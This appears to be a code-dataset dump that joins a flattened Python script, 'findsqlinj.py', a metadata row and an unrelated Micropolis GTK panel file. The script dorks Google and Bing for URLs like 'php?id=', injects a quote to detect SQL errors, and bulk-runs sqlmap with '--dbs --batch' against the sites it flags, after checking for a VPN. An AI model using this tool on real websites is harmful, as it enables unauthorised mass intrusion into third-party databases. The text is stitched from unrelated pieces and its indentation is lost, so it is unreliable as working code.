BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ITALIC = '\x1B[3m'
# Variables which needs to be defined
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
# uafile : string, path to text file of user agents, one per line
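    # Each line is assumed to be a quoted UA with a trailing comma (e.g. "Mozilla/5.0 ...",),
    # which is why the slice below drops the first character and the last two.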
uas = []
with open(uafile, 'rb') as uaf:
for ua in uaf.readlines():
if ua:
uas.append(ua.strip()[1:-1-1])
random.shuffle(uas)
return uas
def inputSearchUrls():
print("\n" + bcolors.HEADER)
print(" #===================================#")
print(" # #")
print(" # Find urls which might is vuln for #")
print(" # SQL injections #")
print(" # #")
print(" #===================================#")
print("\n" + bcolors.ENDC)
print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
# =================================
# Base input
# =================================
# @type basesearch: str
# @param basesearch: Query string. Must NOT be url-encoded.
basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
# @type searchprovider: str
# @param searchprovider: Who should perform the search.
searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
if searchprovider.lower() not in ('b', 'g'):
print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
searchprovider = 'b'
# @type maxperpage: int/str (changed to string)
# @param maxperpage: Max results returned per page
maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
if not maxperpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
maxperpage = 20
# @type maxpages: int
# @param maxpages: Max pages to loop through
maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
if not maxpages.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
maxpages = 10
# @type startpage: int
# @param startpage: First page to look in
startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
if not startpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
startpage = 0
if int(startpage) > 0:
startpage = (int(startpage) - 1)
# @type timeout: int
# @param timeout: Sleep between request
timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
if not timeout.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
timeout = 6
# @type savesearch: str
# @param savesearch: Save the shiat to a file
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
savesearch = 'n'
# @type filename: str
# @param filename: Filename for file containing the search results
if savesearch.lower() == "y":
filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(bcolors.WARNING + " - User disallowed appending to resultfile")
print(bcolors.WARNING + " - Please try again with another filename")
print(bcolors.WARNING + " - Exiting")
sys.exit()
    else:
        filename = "tmpurllist"
# =================================
# Make variables ready to use
# =================================
count = str(maxperpage)
startpage = int(startpage)
pages = (int(maxpages) + startpage)
sleeptime = int(timeout)
string = str(basesearch)
stringurl = urllib.parse.quote_plus(string)
print(bcolors.ENDC + "\n [*]:: Searching")
print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
# =================================
# Loop through pages
# =================================
for start in range(startpage, pages):
# try:
# =========================
# Bing search
# =========================
if searchprovider == "b":
pagenr = int(start)*int(count)+1
address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('h2'):
for a in d.find_all('a', href=True):
if string in a['href']:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + a['href'] + bcolors.ENDC
)
if filename:
with open(filename, 'a') as file:
file.write(a['href'] + "\n")
elif "0.r.msn." in a['href']:
pass
else:
pass
sleep(sleeptime)
# =========================
# Google search
# =========================
elif searchprovider == "g":
pagenr = int(start)*int(count)
address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
# address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('cite'):
url = d.text
if string in url:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + url + bcolors.ENDC
)
if filename == "y":
with open(filename, 'a') as file:
file.write(url + "\n")
sleep(sleeptime)
try:
print("")
# =============================
# Error, end, exit
# =============================
except KeyboardInterrupt:
print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scraping")
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
if savesearch == "y":
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
else:
print(" Total urls collected: " + str(resultsnumber))
# Check urls? Next function activates..
checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
if checkurls.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
checkurls = "y"
if checkurls == "n":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Check if urls is vuln for #")
print(" # SQL injection #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Base input
# =================================
# Base input
if filenameRawUrl != "0":
print(" Filepath from run is still in memory: " + filenameRawUrl)
urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
if urlfileChoose not in ('i', 'u'):
print(bcolors.WARNING + " - Using from memory")
urlfileChoose = 'u'
if urlfileChoose == 'u':
urlfile = filenameRawUrl
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(urlfile):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
# @type verboseactive: str
# @param verboseactive: Verboselevel.
verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
if not verboseactive:
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
verboseactive = "0"
# @type savesearch: str
# @param savesearch: Save the scan to file.
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
savesearch = 'y'
# @type filename: str
# @param filename: Filename for the shiat.
if savesearch == "y":
filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
if not filename:
print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
filename = "vulnurls"
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(" User disallowed appending to resultfile")
print(" Please try again with another filename")
print(" Exiting")
sys.exit()
else:
filename = "0"
print(bcolors.ENDC + "\n [*]::Reading file\n")
print(" [*] Connecting\n")
# =================================
    # Loop through urls and add a quote
# =================================
with open(urlfile) as fileorg:
for line in fileorg:
checkMY1 = 0
checkMY2 = 0
checkMY3 = 0
checkMY4 = 0
checkMS1 = 0
checkMS2 = 0
checkMS3 = 0
checkOR1 = 0
checkOR2 = 0
checkOR3 = 0
checkPO1 = 0
checkPO2 = 0
try:
# Get data
url = line + "'"
print(
" ["
+ time.strftime("%H:%M:%S")
+ "] [*] " + line.strip('\n')
)
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
# Check if vuln - might updated indicationstrings according to
# MySQL
checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
# Microsoft SQL server
checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
                checkMS2 = len(soup.find_all(text=re.compile('An unhandled exception occurred during the execution')))
checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
# Oracle Errors
checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
# Postgre SQL
checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
# Verbose level 1
if verboseactive == "1":
print(" [V] Check1 MySQL found: " + str(checkMY1))
print(" [V] Check2 MySQL found: " + str(checkMY2))
print(" [V] Check3 MySQL found: " + str(checkMY3))
print(" [V] Check4 MySQL found: " + str(checkMY4))
print(" [V] Check5 MS SQL found: " + str(checkMS1))
print(" [V] Check6 MS SQL found: " + str(checkMS2))
print(" [V] Check7 MS SQL found: " + str(checkMS3))
print(" [V] Check8 Oracle found: " + str(checkOR1))
print(" [V] Check9 Oracle found: " + str(checkOR2))
print(" [V] Check10 Oracle found: " + str(checkOR3))
print(" [V] Check11 Postgre found: " + str(checkPO1))
print(" [V] Check12 Postgre found: " + str(checkPO2))
# Verbose level 2
if verboseactive == "2":
checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
                    checkverMS2 = soup.find(text=re.compile('An unhandled exception occurred during the execution'))
checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverPO1 = soup.find(text=re.compile('Query failed:'))
checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
# If X is vuln
if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
print(
bcolors.OKGREEN
+ "\n"
+ " Possible vuln url!"
+ "\n"
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] "
+ line + bcolors.ENDC
+ "\n"
)
if savesearch == "y":
with open(filename, 'a') as file:
file.write(line)
else:
print(
bcolors.WARNING
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [-] " + line + bcolors.ENDC
)
# Skip X or/and exit
except KeyboardInterrupt:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
# Bad X
except:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scanning urls")
if savesearch == "y":
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
if resultsnumber == 0:
print(" No vuln urls, exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
if checkurls == "y":
try:
os.remove("tmpurllist")
except OSError:
pass
scanUrlsSQLmap(filename)
else:
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Scan urls with #")
print(" # SQLmap #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Check if sqlmap installed, file, etc.
# =================================
if shutil.which('sqlmap') is None:
print(" SQLmap is not installed on system - can't go on.")
print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
print(" \nCommand:")
print(" sqlmap -m \"" + filenameVulnUrl + "\n")
else:
if filenameVulnUrl == "0":
print(" No filename in memory, please specify.")
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(filenameVulnUrl):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
print("Command to execute: " + command)
input(bcolors.ENDC + " Press enter to continue\n")
print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
# RUN SQLMAP !!
os.system(command)
# Not implemented - specify saving destination
# @type savingplace: str
# @param savingplace: Who should perform the search.
# savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
# if savingplace not in ('b', 'g'):
# print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
# savingplace = 'b'
def helpme():
print("\n\n" + bcolors.HEADER)
print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
print("\n\n" + bcolors.ENDC)
print(" This python script is developed to show, how many vulnerables websites,")
print(" which are laying around on the web. The main focus of the script is to")
print(" generate a list of vuln urls. Please use the script with causing and")
print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
print(" just for showcasing.")
print("")
print(" The script is divided into 3 main sections.\n")
print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
print(" In this section you have to provide a search string, which 'connects' to")
print(" the websites database, e.g. 'php?id='. The script then crawls")
print(" Bing or Google for urls containing it. All of the urls can then be saved")
print(" into a file. (Please be aware that you might get banned for crawling to")
print(" fast, remember an appropriate break/sleep between request).")
print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
print("")
print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
print(" This section adds a qoute ' to the websites url. If the website is")
print(" prone to SQL injection, we'll catch this with some predefined error")
print(" messages. The script will not add websites for blind SQL injections,")
print(" due to the predefined error messages.")
print("")
print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
print(" This is just an activation of sqlmap with the bulk argument and no")
print(" user interaction for validation of SQL injection.")
print("")
print("\n")
print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
print("\n")
sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
except:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
    if not any(re.match(r'(tun|ppp)\d*$', iface) for iface in psutil.net_if_addrs()):
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
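# Editor's note (illustrative, not part of the original script): psutil.net_if_addrs()
# returns a dict keyed by interface name, so the VPN check above just looks for a
# key such as "tun0" or "ppp0". A quick way to inspect it:
#
#     import psutil
#     print(sorted(psutil.net_if_addrs().keys()))   # e.g. ['eth0', 'lo', 'tun0']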
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| findsqlinj.py | 30,755 | !/usr/bin/python python3 Python script for finding websites which are prone to SQL injections Do crawling on bing or google for possible vuln urls Check url with qoute ' and catch error messages Run sqlmap against urls License: MIT - (c) 2016 ThomasTJ (TTJ) Quit the shiat Working with files and starting sqlmap Searching web results for vuln Calling websites Parsing url encoding for search Checking if SQLmap is installed Checking possible VPN connection Ping to check network connection Shuffle between user agents Printing time when scraping and checking urls Multiple use cases, e.g. sleep between requests Working with website date Variables which needs to be defined uafile : string, path to text file of user agents, one per line ================================= Base input ================================= @type basesearch: str @param basesearch: Query string. Must NOT be url-encoded. @type searchprovider: str @param searchprovider: Who should perform the search. @type maxperpage: int/str (changed to string) @param maxperpage: Max results returned per page @type maxpages: int @param maxpages: Max pages to loop through @type startpage: int @param startpage: First page to look in @type timeout: int @param timeout: Sleep between request @type savesearch: str @param savesearch: Save the shiat to a file @type filename: str @param filename: Filename for file containing the search results ================================= Make variables ready to use ================================= ================================= Loop through pages ================================= try: ========================= Bing search ========================= Loading random useragent select a random user agent ========================= Google search ========================= address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr) Loading random useragent select a random user agent ============================= Error, end, exit ============================= ================================= Done - sum it up ================================= Check urls? Next function activates.. ================================= Base input ================================= Base input @type urlfile: str @param urlfile: File with the raw urls to check. @type urlfile: str @param urlfile: File with the raw urls to check. @type verboseactive: str @param verboseactive: Verboselevel. @type savesearch: str @param savesearch: Save the scan to file. @type filename: str @param filename: Filename for the shiat. ================================= Loop through urls and add a qoute ================================= Get data Loading random useragent select a random user agent Check if vuln - might updated indicationstrings according to MySQL Microsoft SQL server Oracle Errors Postgre SQL Verbose level 1 Verbose level 2 If X is vuln Skip X or/and exit Bad X ================================= Done - sum it up ================================= ================================= Check if sqlmap installed, file, etc. ================================= @type urlfile: str @param urlfile: File with the raw urls to check. RUN SQLMAP !! Not implemented - specify saving destination @type savingplace: str @param savingplace: Who should perform the search. savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE) if savingplace not in ('b', 'g'): print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. 
Using 'b'") savingplace = 'b' Header request for net connectivity Checking for tun0 or ppp @type choice: str @param choice: Weapon of massdestruction GO GO GO | 3,671 | en | 0.6153 |
# micropolisnoticepanel.py
#
# Micropolis, Unix Version. This game was released for the Unix platform
# in or about 1990 and has been modified for inclusion in the One Laptop
# Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. If
# you need assistance with this program, you may contact:
# http://wiki.laptop.org/go/Micropolis or email micropolis@laptop.org.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details. You should have received a
# copy of the GNU General Public License along with this program. If
# not, see <http://www.gnu.org/licenses/>.
#
# ADDITIONAL TERMS per GNU GPL Section 7
#
# No trademark or publicity rights are granted. This license does NOT
# give you any right, title or interest in the trademark SimCity or any
# other Electronic Arts trademark. You may not distribute any
# modification of this program using the trademark SimCity or claim any
# affliation or association with Electronic Arts Inc. or its employees.
#
# Any propagation or conveyance of this program must include this
# copyright notice and these terms.
#
# If you convey this program (or any modifications of it) and assume
# contractual liability for the program to recipients of it, you agree
# to indemnify Electronic Arts for any liability that those contractual
# assumptions impose on Electronic Arts.
#
# You may not misrepresent the origins of this program; modified
# versions of the program must be marked as such and not identified as
# the original program.
#
# This disclaimer supplements the one included in the General Public
# License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS
# PROGRAM IS PROVIDED TO YOU "AS IS," WITH ALL FAULTS, WITHOUT WARRANTY
# OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF
# SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS
# DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES,
# INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY,
# FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY
# RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING,
# USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST
# INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL
# MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE
# UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE
# WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE
# CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR
# ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. SOME
# JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED
# WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A
# CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY
# NOT APPLY TO YOU.
########################################################################
# Micropolis Status View
# Don Hopkins
########################################################################
# Import stuff
from gi.repository import Gtk as gtk
import cairo
from gi.repository import Pango as pango
from . import micropolisengine
from . import micropolisview
from . import micropolisnoticeview
from . import micropolisdrawingarea
########################################################################
# MicropolisNoticePanel
class MicropolisNoticePanel(gtk.Frame):
def __init__(
self,
engine=None,
centerOnTileHandler=None,
**args):
gtk.Frame.__init__(
self,
**args)
self.engine = engine
self.mapViewVisible = False
engine.expressInterest(
self,
('gameMode',))
# Views
hpaned1 = gtk.HPaned()
self.hpaned1 = hpaned1
self.add(hpaned1)
self.noticeView = micropolisnoticeview.MicropolisNoticeView(
engine=engine,
setMapViewVisible=self.setMapViewVisible)
hpaned1.pack1(self.noticeView, resize=False, shrink=False)
mapView = micropolisdrawingarea.NoticeMicropolisDrawingArea(
engine=engine,
centerOnTileHandler=centerOnTileHandler)
self.mapView = mapView
mapView.set_size_request(150, -1)
mapView.visible = False
hpaned1.pack2(mapView, resize=False, shrink=False)
hpaned1.set_position(1000)
def update(self, name, *args):
engine = self.engine
if name == 'gameMode':
self.updateMapViewAdded()
def updateMapViewAdded(self):
engine = self.engine
mapView = self.mapView
if ((engine.gameMode == 'play') and
self.mapViewVisible):
mapView.set_property("visible", True)
mapView.engage()
else:
mapView.set_property("visible", False)
mapView.disengage()
def setMapViewVisible(self, visible, tileX=-1, tileY=-1, sprite=micropolisengine.SPRITE_NOTUSED):
#print "setMapViewVisible", visible, tileX, tileY, self.mapViewVisible
engine = self.engine
mapView = self.mapView
if visible and (tileX >= 0) and (tileY >= 0):
mapView.centerOnTile(tileX, tileY)
mapView.sprite = sprite
self.mapViewVisible = visible
self.updateMapViewAdded()
########################################################################
